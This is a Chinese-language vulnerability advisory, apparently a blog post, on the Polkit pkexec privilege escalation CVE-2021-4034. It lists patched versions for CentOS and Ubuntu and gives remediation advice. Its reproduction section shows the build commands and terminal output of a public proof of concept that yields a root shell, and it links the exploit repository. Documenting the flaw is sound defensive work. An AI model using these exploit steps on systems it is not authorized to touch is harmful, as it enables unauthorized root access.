Linux Polkit本地权限提升漏洞(CVE-2021-4034)
漏洞描述
Polkit是用于在Linux操作系統(tǒng)中控制系統(tǒng)范圍特權(quán)的組件。它為非特權(quán)進(jìn)程提供了與特權(quán)進(jìn)程進(jìn)行通信的有組織的方式。類似“sudo”的用法。
CVE-2021-4034
polkit的pkexec存在本地權(quán)限提升漏洞,已獲得普通權(quán)限的攻擊者可通過此漏洞獲取root權(quán)限。
該漏洞CVSS評分:7.8,
危害等級:高危漏洞利用難度低,最早引入問題的commit來自2009年,影響版本范圍遠(yuǎn)超去年的sudo漏洞。漏洞作者在Ubuntu、Debian、Fedora和CentOS的默認(rèn)安裝環(huán)境上均測試通過。
影響范圍
影響版本:由于polkit為系統(tǒng)預(yù)裝工具,目前主流Linux版本均受影響。
修復(fù)版本:
CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
漏洞復(fù)現(xiàn)
下載poc,進(jìn)入poc目錄,編譯,運(yùn)行。
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo “module UTF-8// PWNKIT// pwnkit 1” > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
whoami
root
exit
poc地址
https://github.com/berdav/CVE-2021-4034
修復(fù)建議
參考漏洞影響范圍,及時升級至最新安全版本。
總結(jié)和參考
1、及時安裝安全軟件,關(guān)閉不需要的服務(wù)和端口。
2、開啟系統(tǒng)防火墻。
3、及時升級系統(tǒng)或者軟件的版本。
總結(jié)
以上是生活随笔為你收集整理的Linux Polkit本地权限提升漏洞(CVE-2021-4034)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C++ 从一幅图片上裁取需要的区域
- 下一篇: Python 编程训练2:二维向量